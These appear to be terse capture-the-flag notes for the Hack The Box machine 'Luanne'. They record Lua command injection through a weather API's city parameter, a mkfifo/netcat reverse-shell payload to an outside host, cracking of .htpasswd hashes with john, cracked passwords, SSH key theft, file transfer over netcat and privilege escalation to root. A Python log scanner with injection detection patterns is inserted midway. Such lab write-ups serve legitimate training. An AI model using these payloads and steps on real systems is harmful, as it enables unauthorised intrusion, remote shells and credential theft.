Luanne
HTB Linux
nmap -A -p- -oA output 10.129.151.88 --min-rate=10000 --script=vuln --script-timeout=15 -v
nmap -sC -sV -O -p- -oA luanne 10.129.151.88
nmap -sU -O -p- -oA luanne-udp 10.129.151.88
nikto -h 10.129.151.88:80
whatweb http://10.129.151.88
http://10.129.151.88/robots.txt
wfuzz -c --hc=404 -t 200 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.129.151.88/weather/FUZZ
http://10.129.151.88/weather/forecast
curl -s -X GET "http://10.129.151.88/weather/forecast?city=London" | jq
Open Burp Suite and intercept the request
GET /weather/forecast?city=list
GET /weather/forecast?city=list']%3b+os.execute['id']--+-'
nc -lvnp 443
GET /weather/forecast?city=list']%3b+os.execute['rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 443 >/tmp/f']--+-'
Press Ctrl+U to URL-encode the selection
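The injection above works because the city value closes the Lua string literal and appends an os.execute call. As an added defensive example (not part of the original write-up), this Python script scans web-server access-log lines for that payload shape in decoded query parameters; the sample log lines and the marker patterns are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access-log lines (not from the original write-up); line 2
# carries the same city-parameter payload shape shown in the request above.
SAMPLE_LOG = """\
10.0.0.5 - - [16/Sep/2020:10:01:02 +0000] "GET /weather/forecast?city=London HTTP/1.1" 200 512
10.0.0.5 - - [16/Sep/2020:10:01:09 +0000] "GET /weather/forecast?city=list%27%5D%3b+os.execute%5B%27id%27%5D--+-%27 HTTP/1.1" 200 88
10.0.0.5 - - [16/Sep/2020:10:01:15 +0000] "GET /weather/forecast?city=list HTTP/1.1" 200 300
"""

# Tokens that have no business inside a city name but appear in the Lua
# injection: a quote that closes the string literal followed by a closing
# bracket and statement separator, a trailing Lua comment marker, and
# calls into the os / io libraries.
LUA_INJECTION_MARKERS = [
    re.compile(r"os\.(execute|getenv|exit)|io\.popen", re.I),
    re.compile(r"['\"]\s*\]\s*;"),      # closes the open string / table index
    re.compile(r"--\s*-?['\"]?$"),      # comment marker swallowing the rest
]

LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def decode_params(target):
    """Return decoded (name, value) pairs from the request target's query string."""
    # parse_qsl already percent-decodes and turns '+' into spaces
    return parse_qsl(urlsplit(target).query, keep_blank_values=True)

def suspicious_params(target):
    """Return the parameter names whose decoded value matches any injection marker."""
    return [name for name, value in decode_params(target)
            if any(p.search(value) for p in LUA_INJECTION_MARKERS)]

def scan_log(text):
    """Return (line_number, target, flagged_params) for each suspicious request."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.search(line)
        if not m:
            continue
        flagged = suspicious_params(m.group("target"))
        if flagged:
            findings.append((lineno, m.group("target"), flagged))
    return findings

if __name__ == "__main__":
    for lineno, target, params in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: Lua injection markers in {params}: {target}")
```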
cat .htpasswd
Save the webapi_user entry and its password hash in a file named hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
Credentials -> webapi_user:iamthebest
ps -auwx
curl -s -X GET http://127.0.0.1:3001
curl -s -X GET http://127.0.0.1:3001/~r.michaels/id_rsa -u 'webapi_user:iamthebest'; echo
Create an id_rsa file with the key
chmod 600 id_rsa
ssh -i id_rsa r.michaels@10.129.151.88
cd backups
cat devel_backup-2020-09-16.tar.gz.enc
netpgp --decrypt devel_backup-2020-09-16.tar.gz.enc --output /tmp/backup.tar.gz
nc 10.10.14.21 < backup.tar.gz
nc -lvnp 443 > backup.tar.gz
cat .htpasswd
vim hash2
john --wordlist=/usr/share/wordlists/rockyou.txt hash2
Credentials -> root:littlebear
doas su root